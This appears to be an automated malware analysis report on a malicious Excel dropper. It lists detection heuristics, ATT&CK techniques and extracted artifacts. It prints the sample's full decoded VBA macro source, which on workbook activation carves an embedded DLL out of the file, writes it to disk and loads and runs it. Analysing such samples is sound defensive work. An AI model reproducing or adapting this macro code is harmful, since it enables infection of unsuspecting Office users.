MALICIOUS
500
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1204.002 Malicious File
T1027 Obfuscated Files or Information
This Excel document contains VBA macros that utilize WScript.Shell and CreateObject to execute embedded code. The critical heuristic 'OLE_EMBEDDED_EXE' indicates a PE executable is embedded within the document, and 'OLE_VBA_ACTIVEX_XLM_STAGER' suggests a mechanism to launch this executable. The presence of VirtualAlloc and VirtualProtect API calls further suggests the execution of shellcode or dynamically loaded code.
Heuristics 12
-
ClamAV: Xls.Dropper.Sdrop-7331943-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Dropper.Sdrop-7331943-0
-
Embedded PE executable critical OLE_EMBEDDED_EXEMZ/PE header found inside document — possible embedded executable
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Dim SpecialPath As String Set D500 = CreateObject("WScript.Shell") -
VBA ActiveX event launches decoded Excel4 macro critical OLE_VBA_ACTIVEX_XLM_STAGERVBA code attached to an auto-firing ActiveX/UserForm control event (e.g. _Layout/_Change/_Painted) decodes a string with Replace/Split/Join/StrReverse/Chr and passes the recovered formula text to ExecuteExcel4Macro. This bridges VBA event activation into XLM formula execution to call Win32 APIs / drop payloads while evading AutoOpen and Shell keyword detection — a high-confidence macro stager, not a specific Office parser CVE.Matched line in script
Debug.Print Temp1 CCount = Application.ExecuteExcel4Macro(Temp1) Debug.Print CCount -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Dim SpecialPath As String Set D500 = CreateObject("WScript.Shell") -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Reference to LoadLibrary API high SC_STR_LOADLIBRARYReference to LoadLibrary API
-
Reference to GetProcAddress API high SC_STR_GETPROCADDRESSReference to GetProcAddress API
-
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOCReference to VirtualAlloc API
-
Reference to VirtualProtect API medium SC_STR_VIRTUALPROTECTReference to VirtualProtect API
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8010 bytes |
SHA-256: 2fdbb7387ec95608b3db06dd9f891f58ce9933ddbe09ad22196d9addbdfb86f8 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Sem"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Activate()
If UserForm1.Visible = False Then
Module1.Workbook_Activate
End If
End Sub
Attribute VB_Name = "Page1"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
#If Win64 Then
Public Declare PtrSafe Function RbdSAslla Lib _
"module_p2.dll" () As Integer
Public Declare PtrSafe Function RbdSAslla2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
#Else
Public Declare Function RbdSAslla2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
Public Declare Function RbdSAslla Lib _
"module_p1.dll" () As Integer
#End If
Public Sub NewValuje(s As String, nm As String, fl As Long, d_6 As Integer)
Dim d_1 As Long, d_2 As Byte, d_3 As Byte, d_4 As Byte
Dim d_5() As Long
ReDim d_5(1 To fl)
d_5(1) = CByte(50 + 27)
d_5(2) = CByte(50 + 40)
d_5(3) = CByte(50 + 94)
d_1 = FreeFile
Open s For Binary Access Read As d_1
Dim cur As Integer
cur = 1
Do While Not EOF(d_1)
Get d_1, , d_2
If d_2 = d_5(1) Then
Get d_1, , d_3
If d_3 = d_5(2) Then
Get d_1, , d_4
If d_4 = d_5(3) Then
If cur = d_6 Then
For k = 4 To fl
Get d_1, , d_2
d_5(k) = d_2
Next k
Exit Do
Else
cur = cur + 1
End If
End If
End If
End If
Loop
Close d_1
d_1 = FreeFile
Open nm For Binary Lock Read Write As #d_1
For i = LBound(d_5) To UBound(d_5)
Put #d_1, , CByte(d_5(i))
Next i
Close #d_1
End Sub
Public Sub Workbook_Activate()
ExecuteExcel4Macro "MESSAGE(False, ""Debug"")"
Dim D500 As Object
Dim SpecialPath As String
Set D500 = CreateObject("WScript.Shell")
UserForm2.TextBox1.Tag = D500.ExpandEnvironmentStrings("%" + UserForm2.TextBox1.Tag + "%")
UserForm2.TextBox1.Tag = Replace(UserForm2.TextBox1.Tag, "%", "")
UserForm2.TextBox2.Tag = D500.SpecialFolders(UserForm2.TextBox2.Tag)
ChDir (UserForm2.TextBox1.Tag)
UserForm1.show
ExecuteExcel4Macro "MESSAGE(False, ""Debug"")"
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{9B3DABF1-341B-4E96-99C1-B7207A1AB871}{32B70631-FA61-4E0F-8568-AC4DDCD97227}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Label1_Click()
End Sub
Private Sub UserForm_Activate()
DoEvents
ReplaceCurrentModule
End Sub
Private Sub UserForm_Initialize()
Call SystemButtonSettings(Me, False)
End Sub
Attribute VB_Name = "Module2"
Private Const GWL_STYLE = -16
Private Const WS_CAPTION = &HC00000
Private Const WS_SYSMENU = &H80000
#If VBA7 Then
Private Declare PtrSafe Function GetWindowLong _
Lib "user32" Alias "GetWindowLongA" (ByVal hWnd As Long, _
ByVal nIndex As Long) As Long
Private Declare PtrSafe Function SetWindowLong _
Lib "user32" Alias "SetWindowLongA" (ByVal hWnd As Long, _
ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
Private Declare PtrSafe Function FindWindowA _
Lib "user32" (ByVal lpClassName As String, _
ByVal lpWindowName As String) As Long
Private Declare PtrSafe Function DrawMenuBar _
Lib "user32" (ByVal hWnd As Long) As Long
#Else
Private Declare Function GetWindowLong _
Lib "user32" Alias "GetWindowLongA" ( _
ByVal hWnd As Long, ByVal nIndex As Long) As Long
Private Declare Function SetWindowLong _
Lib "user32" Alias "SetWindowLongA" ( _
ByVal hWnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
Private Declare Function FindWindowA _
Lib "user32" (ByVal lpClassName As String, _
ByVal lpWindowName As String) As Long
Private Declare Function DrawMenuBar _
Lib "user32" (ByVal hWnd As Long) As Long
#End If
Public Sub KillArray(ParamArray PathList() As Variant)
On Error Resume Next
For Each Key In PathList
Kill Key
Next Key
On Error GoTo 0
End Sub
Public Sub SystemButtonSettings(frm As Object, show As Boolean)
Dim windowStyle As Long
Dim windowHandle As Long
windowHandle = FindWindowA(vbNullString, frm.Caption)
windowStyle = GetWindowLong(windowHandle, GWL_STYLE)
If show = False Then
SetWindowLong windowHandle, GWL_STYLE, (windowStyle And Not WS_SYSMENU)
Else
SetWindowLong windowHandle, GWL_STYLE, (windowStyle + WS_SYSMENU)
End If
DrawMenuBar (windowHandle)
End Sub
Attribute VB_Name = "Module3"
Public Sub ReplaceCurrentModule()
TempName = UserForm2.TextBox1.Tag & "\templates.xlsx"
ZipName = TempName + ".zip"
ZipFolder = UserForm2.TextBox1.Tag '& "\UnzTmp"
Dim nm As String
Dim API_LENGTH As Long
Dim d_6 As Integer
nm = UserForm2.TextBox2.Tag + "\module_p1"
API_LENGTH = 266240
d_6 = 1
#If Win64 Then
nm = UserForm2.TextBox2.Tag + "\module_p2"
API_LENGTH = 186368
d_6 = 2
#End If
nm = nm + ".d" + "ll"
KillArray ZipFolder & "\oleObj" + "ect*.bin", ZipName, nm
DoEvents
ThisWorkbook.Sheets.Copy
Application.DisplayAlerts = False
ActiveWorkbook.SaveAs TempName, FileFormat:=51
DoEvents
ActiveWorkbook.Close
DoEvents
FileCopy TempName, ZipName
Set oApp = CreateObject("Shell.Application")
oApp.Namespace(ZipFolder).CopyHere oApp.Namespace(ZipName).items.Item("xl\embeddings\oleObject1.bin")
NewValuje ZipFolder + "\oleObject1.bin", nm, API_LENGTH, d_6
ChDir (UserForm2.TextBox2.Tag)
No_RbdSAslla = RbdSAslla2(nm)
RbdSAslla
End Sub
Sub test()
Temp = "'" & ThisWorkbook.Path & "\[web.xlsm]Sheet1'!"
Temp1 = Temp & Rows(1).Address(, , xlR1C1)
Temp1 = "Counta(" & Temp1 & ")"
Debug.Print Temp1
CCount = Application.ExecuteExcel4Macro(Temp1)
Debug.Print CCount
Temp2 = Temp & Columns("A").Address(, , xlR1C1)
Temp2 = "Counta(" & Temp2 & ")"
RCount = Application.ExecuteExcel4Macro(Temp2)
ReDim arr(1 To RCount, 1 To CCount)
For R = 1 To RCount
For C = 1 To CCount
Temp3 = Temp & Cells(R, C).Address(, , xlR1C1)
arr(R, C) = Application.ExecuteExcel4Macro(Temp3)
Next
Next
Range("A1").ReAPI_LENGTH(RCount, CCount).Value = arr
End Sub
Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{60B2D69D-A27B-4B98-B9AA-38D5112CA728}{F641394C-4A27-46FC-926F-6EE29F9DC7B1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Page11"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
embedded_office_00003186.exe |
embedded-pe | Office MZ+PE at offset 0x3186 | 747130 bytes |
SHA-256: 0eb6ebb8cf869b8f212e05b5b41aa79c1d24c2e9d310b6b341438bc8fb16c4a9 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Static shellcode analysis recovered command string(s): WScript.Shell
|
|||
ole10native_00.bin |
ole-package | OLE Ole10Native stream: MBD006B9836/Ole10Native | 465961 bytes |
SHA-256: dbcae8c5a528096d8a676fbc8ae8b8863392f22f389f436f5eaa3aaaacec374a |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.